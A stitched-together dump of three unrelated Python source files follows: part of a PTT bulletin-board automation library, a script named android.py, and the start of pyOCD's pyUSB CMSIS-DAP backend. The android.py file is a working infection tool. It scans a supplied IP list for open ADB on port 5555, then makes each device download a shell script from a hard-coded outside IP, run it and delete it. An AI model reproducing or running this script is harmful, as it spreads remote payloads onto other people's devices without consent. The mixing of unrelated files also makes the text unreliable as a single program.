self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
Board = str(Board)
Content = str(Content)
PostID = str(PostID)
Index = int(Index)
# 前進至主頁面
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 '
# 前進至文章
if PostID != '':
SendMessage += '#' + PostID + '\r\rr'
elif Index != -1:
SendMessage += str(Index) + '\r\rr'
SendMessage += ReplyResponse + '\r'
SendMessage += 'y\ry\r'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'編輯文章',
'編輯文章',
ResponseUnit(Content + '\r\x18s\r', True),
#
),
DetectUnit(
'不加簽名檔',
'x=隨機',
ResponseUnit('0\r', False),
),
DetectUnit(
'送出回文',
'請按任意鍵繼續',
ResponseUnit(GotoMainMenuCommand, False),
),
DetectUnit(
'自存底稿',
'是否自存底稿',
ResponseUnit('y\r', False),
),
DetectUnit(
'',
'我是' + self.__ID,
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
def __crawlBoardThread(self, ConnectIndex, Board, PostHandler, StartIndex, EndIndex, SearchType, Search):
self.Log('連線頻道 ' + str(ConnectIndex) + ' ' + Board + ' 爬行 ' + str(StartIndex) + ' ' + str(EndIndex))
if not self.__isConnected[ConnectIndex] and ConnectIndex > 0:
# self.__CrawLock.acquire()
self.__connectRemote(ConnectIndex)
self.__EnableLoginCount += 1
# self.__CrawLock.release()
while self.__EnableLoginCount < self.__EnableLogin:
time.sleep(1)
for PostIndex in range(StartIndex, EndIndex):
self.__IdleTime = 0
ErrCode, Post = self.getPost(Board, PostIndex=PostIndex, _ConnectIndex=ConnectIndex, SearchType=SearchType, Search=Search)
if not self.__isBackground:
self.__ProgressBarCount += 1
self.__ProgressBar.update(self.__ProgressBarCount)
if ErrCode == ErrorCode.PostDeleted:
self.__DeleteCrawCount += 1
elif ErrCode != ErrorCode.Success:
self.__ErrorGetPostList.append([ErrCode, Board, PostIndex])
continue
self.__SuccessCrawCount += 1
self.__CrawLock.acquire()
# self.Log(Post.getTitle())
try:
PostHandler(Post)
except TypeError:
self.Log('PostHandler 介面錯誤', LogLevel.WARNING)
except:
self.Log('PostHandler 未知錯誤', LogLevel.WARNING)
self.__CrawLock.release()
self.Log('頻道 ' + str(ConnectIndex) + ' 爬行完畢', LogLevel.DEBUG)
return
def crawlBoard(self, Board, PostHandler, MaxMultiLogin=0, StartIndex=0, EndIndex=0, SearchType=0, Search='', MaxThreadPost=100):
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, 0, 0
try:
Board = str(Board)
StartIndex = int(StartIndex)
EndIndex = int(EndIndex)
MaxMultiLogin = int(MaxMultiLogin)
Search = str(Search)
MaxThreadPost = int(MaxThreadPost)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
if MaxMultiLogin < 0 or 5 < MaxMultiLogin:
self.Log('多重登入設定錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
if MaxThreadPost < 1:
self.Log('每個線程負責文章數設定錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
self.__MaxMultiLogin = MaxMultiLogin
ErrCode, NewestIndex = self.getNewestIndex(Board=Board, SearchType=SearchType, Search=Search)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
if StartIndex == 0 and EndIndex == 0:
StartIndex = 1
EndIndex = NewestIndex
elif StartIndex < 1 or NewestIndex < StartIndex:
self.Log('文章編號區間輸入錯誤: 開始標記不在 ' + Board + ' 板範圍中', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
elif EndIndex < 1 or NewestIndex < EndIndex:
self.Log('文章編號區間輸入錯誤: 結束標記不在 ' + Board + ' 板範圍中', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
elif EndIndex < StartIndex:
self.Log('文章編號區間輸入錯誤: 開始標記比結束標記大', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
self.__CrawLock = threading.Lock()
self.__TotalPost = EndIndex - StartIndex + 1
self.__EnableLogin = 1
self.__SuccessCrawCount = 0
self.__DeleteCrawCount = 0
self.__ErrorGetPostList = []
if not self.__isBackground:
self.__ProgressBar = progressbar.ProgressBar(max_value=self.__TotalPost)
self.__ProgressBarCount = 0
self.Log('總爬行文章: ' + str(self.__TotalPost) + ' 篇')
if self.__MaxMultiLogin > 0:
TempStr = '啟動連線頻道 '
for i in range(self.__MaxMultiLogin):
if (i + 1) * MaxThreadPost <= self.__TotalPost:
self.__EnableLogin += 1
TempStr += str(i) + ' '
self.Log(TempStr)
self.__CrawPoolList = []
CrawThreadList = []
Basic = int(self.__TotalPost / self.__EnableLogin)
LastEndIndexTemp = StartIndex
for i in range(0, self.__EnableLogin):
StartIndexTemp = LastEndIndexTemp
EndIndexTemp = (i + 1) * Basic + StartIndex
if self.__TotalPost % self.__EnableLogin > i:
EndIndexTemp += 1
LastEndIndexTemp = EndIndexTemp
# self.Log(str(StartIndexTemp) + ' ' + str(EndIndexTemp) + ':' + str(EndIndexTemp - StartIndexTemp))
# self.__CrawPoolList.append([StartIndexTemp, EndIndexTemp])
CrawThreadList.append(threading.Thread(target=self.__crawlBoardThread, args=(i, Board, PostHandler, StartIndexTemp, EndIndexTemp, SearchType, Search)))
self.__EnableLoginCount = 1
for SubThread in CrawThreadList:
SubThread.start()
for SubThread in CrawThreadList:
SubThread.join()
if not self.__isBackground:
self.__ProgressBar.update(self.__TotalPost)
self.__ProgressBar.finish()
for ErrorEvent in self.__ErrorGetPostList:
self.Log('-----------------', LogLevel.DEBUG)
self.Log(ErrorEvent[0], LogLevel.DEBUG)
self.Log(ErrorEvent[1], LogLevel.DEBUG)
self.Log(ErrorEvent[2], LogLevel.DEBUG)
if len(self.__ErrorGetPostList) != 0:
self.Log('-----------------', LogLevel.DEBUG)
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode, self.__SuccessCrawCount, self.__DeleteCrawCount
def throwWaterBall(self, WaterBallTarget, WaterBallContent):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
WaterBallTarget = str(WaterBallTarget)
WaterBallContent = str(WaterBallContent)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
ErrCode, User = self.getUser(WaterBallTarget)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
# print(WaterBallTarget + ': ' + User.getState())
if '不在站上' in User.getState():
ErrCode = ErrorCode.UserNotOnline
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
# 前進至主頁面
SendMessage = GotoMainMenuCommand
SendMessage += 'T\rU\rs' + WaterBallTarget + '\rw'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'打開呼叫器',
'您的呼叫器目前設定為關閉',
ResponseUnit('y', True),
),
DetectUnit(
'丟 ' + WaterBallTarget + ' 水球',
'丟 ' + WaterBallTarget + ' 水球',
ResponseUnit(WaterBallContent + '\r\r', True),
),
DetectUnit(
'',
'',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
# self.Log('SendMessage: \n' + SendMessage )
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg())
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
def delPost(self, Board, PostID='', PostIndex=0):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
PostID = str(PostID)
PostIndex = int(PostIndex)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if len(Board) == 0:
self.Log('看板名稱輸入錯誤: ' + str(Board))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex != 0 and PostID != '':
self.Log('文章編號與代碼輸入錯誤: 同時輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex == 0 and PostID == '':
self.Log('文章編號與代碼輸入錯誤: 皆無輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostID != '':
ErrCode, Post = self.getPost(Board, PostID=PostID)
if PostIndex != 0:
ErrCode, Post = self.getPost(Board, PostIndex=PostIndex)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if not Post.getAuthor().startswith(self.__ID):
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
# 前進至文章
if PostID != '':
SendMessage += '#' + PostID + '\rd'
elif PostIndex != -1:
SendMessage += str(PostIndex) + '\rd'
Refresh = False
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'確定刪除文章',
'請確定刪除(Y/N)?',
ResponseUnit('y\r', False),
),
DetectUnit(
'正在刪除文章',
'請按任意鍵繼續',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
def operateFriendList(self, inputOperateType, inputFriendListType, SpecialListIndex=-1, ID='' , SpecialListName=''):
self.__IdleTime = 0
ErrCode = ErrorCode.Success
result = None
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
inputOperateType = int(inputOperateType)
inputFriendListType = int(inputFriendListType)
SpecialListIndex = int(SpecialListIndex)
ID = str(ID)
SpecialListName = str(SpecialListName)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputFriendListType < FriendListType.MinValue or FriendListType.MaxValue < inputFriendListType:
self.Log('輸入錯誤: FriendListType 錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputFriendListType == FriendListType.OtherSpecial:
if SpecialListIndex < 0 or 9 < SpecialListIndex:
self.Log('輸入錯誤: SpecialListIndex 錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputOperateType < OperateType.MinValue or OperateType.MaxValue < inputOperateType:
self.Log('輸入錯誤: OperateType 錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputOperateType == OperateType.Add or inputOperateType == OperateType.Del:
if ID == '':
self.Log('輸入錯誤: 新增或刪除模式下,需要輸入 ID', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputOperateType == OperateType.Add:
ErrCode, User = self.getUser(ID)
if ErrCode == ErrorCode.NoUser:
self.Log('沒有此使用者', LogLevel.WARNING)
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('取得使用者資訊錯誤 錯誤碼:' + str(ErrCode))
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].acquire()
SendMessage = GotoMainMenuCommand + 'N\r'
# 前進至個別選單
if inputFriendListType == FriendListType.GoodFriend:
SendMessage += 'O\r'
elif inputFriendListType == FriendListType.BadGuy:
SendMessage += 'B\r'
elif inputFriendListType == FriendListType.LoginNotification:
SendMessage += 'A\r'
elif inputFriendListType == FriendListType.OtherSpecial:
SendMessage += 'S\r' + str(SpecialListIndex) + '\r'
Refresh = True
isBreakDetect = False
if inputOperateType == OperateType.Add:
DetectTargetList = [
DetectUnit(
'系統正在更新清單...',
'正在更新與同步線上使用者及好友名單',
ResponseUnit(' ', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱:' + SpecialListName,
ResponseUnit('\r', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱',
ResponseUnit(self.__delAllWord + SpecialListName + '\r', False),
),
DetectUnit(
'新增名單',
'(A)增加',
ResponseUnit('A\r' + ID + '\r\r', True),
),
DetectUnit(
'退出名單',
'【名單編輯】',
ResponseUnit('\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
elif inputOperateType == OperateType.Del:
DetectTargetList = [
DetectUnit(
'系統正在更新清單...',
'正在更新與同步線上使用者及好友名單',
ResponseUnit(' ', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱:' + SpecialListName,
ResponseUnit('\r', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱',
ResponseUnit(self.__delAllWord + SpecialListName + '\r', False),
),
DetectUnit(
'刪除名單',
'(D)刪除',
ResponseUnit('D\r' + ID + '\r\r', True),
),
DetectUnit(
'退出名單',
'【名單編輯】',
ResponseUnit('\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
elif inputOperateType == OperateType.Query:
DetectTargetList = [
DetectUnit(
'解析名單',
'名單上限',
ResponseUnit('Q\r', False),
),
DetectUnit(
'退出名單',
'【名單編輯】',
ResponseUnit('\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
ListPage = ''
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if '解析名單' == DetectTarget.getDisplayMsg():
ListPage = self.__ReceiveData[ConnectIndex]
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if inputOperateType == OperateType.Query:
result = []
List = ListPage.split('\n')[2:]
for Line in List:
if Line.startswith('[K'):
Line = Line[2:]
TempList = Line.split(' ')
TempList = list(filter(None, TempList))
result.extend(TempList)
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
def getHistoricalWaterBall(self, WaterBallOperateType=0):
self.__IdleTime = 0
ErrCode = ErrorCode.Success
result = []
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
try:
WaterBallOperateType = int(WaterBallOperateType)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if WaterBallOperateType == 0:
WaterBallOperateType = Information.WaterBallOperateType.DoNothing
elif WaterBallOperateType < Information.WaterBallOperateType.MinValue or Information.WaterBallOperateType.MaxValue < WaterBallOperateType:
self.Log('錯誤的輸入: OperateType 輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].acquire()
SendMessage = GotoMainMenuCommand + 'T\rD\r'
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'水球頁面讀取完成',
'(100%) 目前',
ResponseUnit('qC\rY\r', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'水球頁面讀取完成',
'頁 (100%)',
ResponseUnit('\x1b\x4fDC\rY\r', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'目前顯示: 第',
ResponseUnit('', True),
),
DetectUnit(
'',
'瀏覽 第',
ResponseUnit('', True),
),
DetectUnit(
'無訊息記錄',
'◆ 暫無訊息記錄',
ResponseUnit('y\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'按任意鍵繼續',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
NoMsg = False
PageIndex = 2
# 預設先把第一頁的前五行拿掉 分別為 作者 標題 時間 分隔線與一行空白
LastPageIndex = 0
WaterBallListTemp = []
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=True)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if '無訊息記錄' in DetectTarget.getDisplayMsg():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
NoMsg = True
break
CurrentPage = self.__ReceiveData[ConnectIndex]
if CurrentPage.startswith('[2J'):
CurrentPage = CurrentPage[3:]
CurrentPageList = CurrentPage.split('\n')
PageLineRangeTemp = CurrentPageList[-1][CurrentPageList[-1].find(' 瀏覽 第'):]
PageLineRange = re.findall(r'\d+', PageLineRangeTemp)
PageLineRange = list(map(int, PageLineRange))[3:]
OverlapLine = LastPageIndex - PageLineRange[0] + 1
if OverlapLine >= 1 and LastPageIndex != 0:
# print('重疊', OverlapLine, '行')
CurrentPageList = CurrentPageList[OverlapLine:]
LastPageIndex = PageLineRange[1]
CurrentPageList[-1] = CurrentPageList[-1][:CurrentPageList[-1].rfind(']') + 1]
WaterBallListTemp.extend(CurrentPageList)
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = str(PageIndex) + '\r'
PageIndex += 1
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + 'Part 1', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if not NoMsg:
for i in range(len(WaterBallListTemp)):
while WaterBallListTemp[i].startswith(' '):
WaterBallListTemp[i] = WaterBallListTemp[i][1:]
for line in WaterBallListTemp:
Type = 0
if line.startswith('To'):
# print('Send water ball: ' + line)
Type = WaterBallType.Send
WaterBallAuthor = line[3 : line.find(':')]
elif line.startswith('★'):
# print('Catch water ball: ' + line)
Type = WaterBallType.Catch
WaterBallAuthor = line[1 : line.find(' ')]
if Type != 0:
WaterBallContent = line[line.find(' ') + 1 : line.rfind('[') - 1]
WaterBallDate = line[line.rfind('[') + 1 : line.rfind(']')]
CurrentWaterBall = Information.WaterBallInformation(Type, WaterBallAuthor, WaterBallContent, WaterBallDate)
result.append(CurrentWaterBall)
isBreakDetect = False
# 先後順序代表偵測的優先順序
if WaterBallOperateType == Information.WaterBallOperateType.Clear:
SendMessage = 'qC\rY\r' + GotoMainMenuCommand
DetectTargetList = [
DetectUnit(
'清除水球歷史紀錄完成',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
PTTBUGDetectUnit,
]
elif WaterBallOperateType == Information.WaterBallOperateType.Mail:
SendMessage = 'qM\r' + GotoMainMenuCommand
DetectTargetList = [
DetectUnit(
'水球歷史紀錄寄回信箱完成',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
PTTBUGDetectUnit,
]
else:
SendMessage = 'qR\r' + GotoMainMenuCommand
DetectTargetList = [
DetectUnit(
'保存水球歷史紀錄',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
PTTBUGDetectUnit,
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=True)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = DetectTarget.getResponse().getSendMessage()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + 'Part 2', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
def register(self, newID):
self.__IdleTime = 0
ErrCode = ErrorCode.Success
ConnectIndex = 0
self.Log('因 PTT 關閉註冊功能 暫時無法提供註冊 API')
return ErrorCode.DeprecatedAPI
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
newID = str(newID)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
SendMessage = ''
Refresh = False
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
def getErrorCode(self):
return self.__ErrorCode
def readPostFile(self, FileName):
self.__IdleTime = 0
return Util.readPostFile(FileName)
def getVersion(self):
self.__IdleTime = 0
return Version
if __name__ == '__main__':
print('PTT Library v ' + Version)
print('Developed by PTT CodingMan')
|
android.py
|
import sys
import threading
import requests
import os
import socket
import time
from Queue import *
from threading import Thread
if len(sys.argv) < 3:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list] [output]")
ips = open(sys.argv[1], "r").readlines()
output = sys.argv[2]
queue = Queue()
queue_count = 0
info = open(str(sys.argv[1]),'a+')
def rtek(ip):
ip = str(ip).rstrip("\n")
try:
adb = socket.socket()
adb.settimeout(5)
adb.connect((ip,5555))
os.system("echo "+ip+" >> "+output+"")
os.system("adb connect "+ip+"")
time.sleep(3);
os.system("adb -s "+ip+":5555 shell \"cd /data/local/tmp; wget http://178.128.244.61/a.sh; chmod 777 a.sh; sh a.sh; rm -rf a.sh\"")
adb.close()
except Exception:
adb.close()
pass
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=rtek, args=(input,))
thread.start()
time.sleep(0.05)
except KeyboardInterrupt:
os.kill(os.getpid(), 9)
thread.join()
return
if __name__ == "__main__":
main()
|
pyusb_v2_backend.py
|
# pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .interface import Interface
from .common import (USB_CLASS_VENDOR_SPECIFIC, filter_device_by_class, is_known_cmsis_dap_vid_pid)
from ..dap_access_api import DAPAccessIntf
from ... import common
import logging
import os
import threading
import six
from time import sleep
import errno
import platform
LOG = logging.getLogger(__name__)
try:
import usb.core
import usb.util
except:
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSBv2(Interface):
"""!
@brief CMSIS-DAPv2 interface using pyUSB.
"""
isAvailable = IS_AVAILABLE
def __init__(self):
super(PyUSBv2, self).__init__()
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rx_stop_event = None
self.swo_thread = None
self.swo_stop_event = None
self.rcv_data = []
self.swo_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 512
self.is_swo_running = False
@property
def has_swo_ep(self):
